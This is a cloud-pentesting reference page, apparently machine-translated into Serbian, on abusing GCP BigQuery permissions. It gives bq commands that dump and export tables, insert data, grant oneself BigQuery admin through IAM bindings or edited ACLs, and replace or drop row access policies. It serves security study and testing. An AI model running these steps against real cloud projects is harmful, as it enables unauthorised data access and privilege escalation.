GCP - BigQuery Privesc

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

BigQuery

Za više informacija o BigQuery, proverite:

GCP - Bigquery Enum

Read Table

Čitanjem informacija koje su pohranjene unutar BigQuery tabele, može biti moguće pronaći senzitivne informacije. Da biste pristupili informacijama, potrebne su dozvole bigquery.tables.get, bigquery.jobs.create i bigquery.tables.getData:

bq head <dataset>.<table>
bq query --nouse_legacy_sql 'SELECT * FROM `<proj>.<dataset>.<table-name>` LIMIT 1000'

Export data

Ovo je još jedan način da se pristupi podacima. Izvezite ih u skladišni prostor u oblaku i preuzmite datoteke sa informacijama. Da biste izvršili ovu radnju, potrebna su sledeća ovlašćenja: bigquery.tables.export, bigquery.jobs.create i storage.objects.create.

bq extract <dataset>.<table> "gs://<bucket>/table*.csv"

Insert data

Možda je moguće uneti određene pouzdane podatke u Bigquery tabelu kako bi se iskoristila ranjivost na nekom drugom mestu. Ovo se može lako uraditi sa dozvolama bigquery.tables.get, bigquery.tables.updateData i bigquery.jobs.create:

# Via query
bq query --nouse_legacy_sql 'INSERT INTO `<proj>.<dataset>.<table-name>` (rank, refresh_date, dma_name, dma_id, term, week, score) VALUES (22, "2023-12-28", "Baltimore MD", 512, "Ms", "2019-10-13", 62), (22, "2023-12-28", "Baltimore MD", 512, "Ms", "2020-05-24", 67)'

# Via insert param
bq insert dataset.table /tmp/mydata.json

`bigquery.datasets.setIamPolicy`

Napadač bi mogao da zloupotrebi ovu privilegiju da dodeli sebi dodatne dozvole nad BigQuery skupom podataka:

# For this you also need bigquery.tables.getIamPolicy
bq add-iam-policy-binding \
--member='user:<email>' \
--role='roles/bigquery.admin' \
<proj>:<dataset>

# use the set-iam-policy if you don't have bigquery.tables.getIamPolicy

`bigquery.datasets.update`, (`bigquery.datasets.get`)

Samo ova dozvola omogućava da ažurirate svoj pristup BigQuery skupu podataka modifikovanjem ACL-ova koji ukazuju ko može da mu pristupi:

# Download current permissions, reqires bigquery.datasets.get
bq show --format=prettyjson <proj>:<dataset> > acl.json
## Give permissions to the desired user
bq update --source acl.json <proj>:<dataset>
## Read it with
bq head $PROJECT_ID:<dataset>.<table>

`bigquery.tables.setIamPolicy`

Napadač bi mogao da zloupotrebi ovu privilegiju da dodeli sebi dodatne dozvole nad BigQuery tabelom:

# For this you also need bigquery.tables.setIamPolicy
bq add-iam-policy-binding \
--member='user:<email>' \
--role='roles/bigquery.admin' \
<proj>:<dataset>.<table>

# use the set-iam-policy if you don't have bigquery.tables.setIamPolicy

`bigquery.rowAccessPolicies.update`, `bigquery.rowAccessPolicies.setIamPolicy`, `bigquery.tables.getData`, `bigquery.jobs.create`

Prema dokumentaciji, sa pomenutim dozvolama moguće je ažurirati politiku reda. Međutim, koristeći cli bq potrebne su vam još neke: bigquery.rowAccessPolicies.create, bigquery.tables.get.

bq query --nouse_legacy_sql 'CREATE OR REPLACE ROW ACCESS POLICY <filter_id> ON `<proj>.<dataset-name>.<table-name>` GRANT TO ("<user:user@email.xyz>") FILTER USING (term = "Cfba");' # A example filter was used

Moguće je pronaći ID filtera u izlazu enumeracije pravila redova. Primer:

bq ls --row_access_policies <proj>:<dataset>.<table>

Id        Filter Predicate            Grantees              Creation Time    Last Modified Time
------------- ------------------ ----------------------------- ----------------- --------------------
apac_filter   term = "Cfba"      user:asd@hacktricks.xyz   21 Jan 23:32:09   21 Jan 23:32:09

Ако имате bigquery.rowAccessPolicies.delete уместо bigquery.rowAccessPolicies.update, можете једноставно да избришете политику:

# Remove one
bq query --nouse_legacy_sql 'DROP ALL ROW ACCESS POLICY <policy_id> ON `<proj>.<dataset-name>.<table-name>`;'

# Remove all (if it's the last row policy you need to use this
bq query --nouse_legacy_sql 'DROP ALL ROW ACCESS POLICIES ON `<proj>.<dataset-name>.<table-name>`;'

Joša jedna potencijalna opcija za zaobilaženje politika pristupa redovima bi bila da jednostavno promenite vrednost ograničenih podataka. Ako možete da vidite samo kada je term Cfba, jednostavno izmenite sve zapise u tabeli da imaju term = "Cfba". Međutim, ovo je sprečeno od strane bigquery-a.

Učite i vežbajte AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Učite i vežbajte GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Podržite HackTricks

Proverite planove pretplate!
Pridružite se 💬 Discord grupi ili telegram grupi ili pratite nas na Twitteru 🐦 @hacktricks_live.
Podelite hakerske trikove slanjem PR-ova na HackTricks i HackTricks Cloud github repozitorijume.

PreviousGCP - Batch Privesc NextGCP - ClientAuthConfig Privesc

Last updated 3 days ago

BigQuery

Read Table

Export data

Insert data

bigquery.datasets.setIamPolicy

bigquery.datasets.update, (bigquery.datasets.get)

bigquery.tables.setIamPolicy

bigquery.rowAccessPolicies.update, bigquery.rowAccessPolicies.setIamPolicy, bigquery.tables.getData, bigquery.jobs.create

`bigquery.datasets.setIamPolicy`

`bigquery.datasets.update`, (`bigquery.datasets.get`)

`bigquery.tables.setIamPolicy`

`bigquery.rowAccessPolicies.update`, `bigquery.rowAccessPolicies.setIamPolicy`, `bigquery.tables.getData`, `bigquery.jobs.create`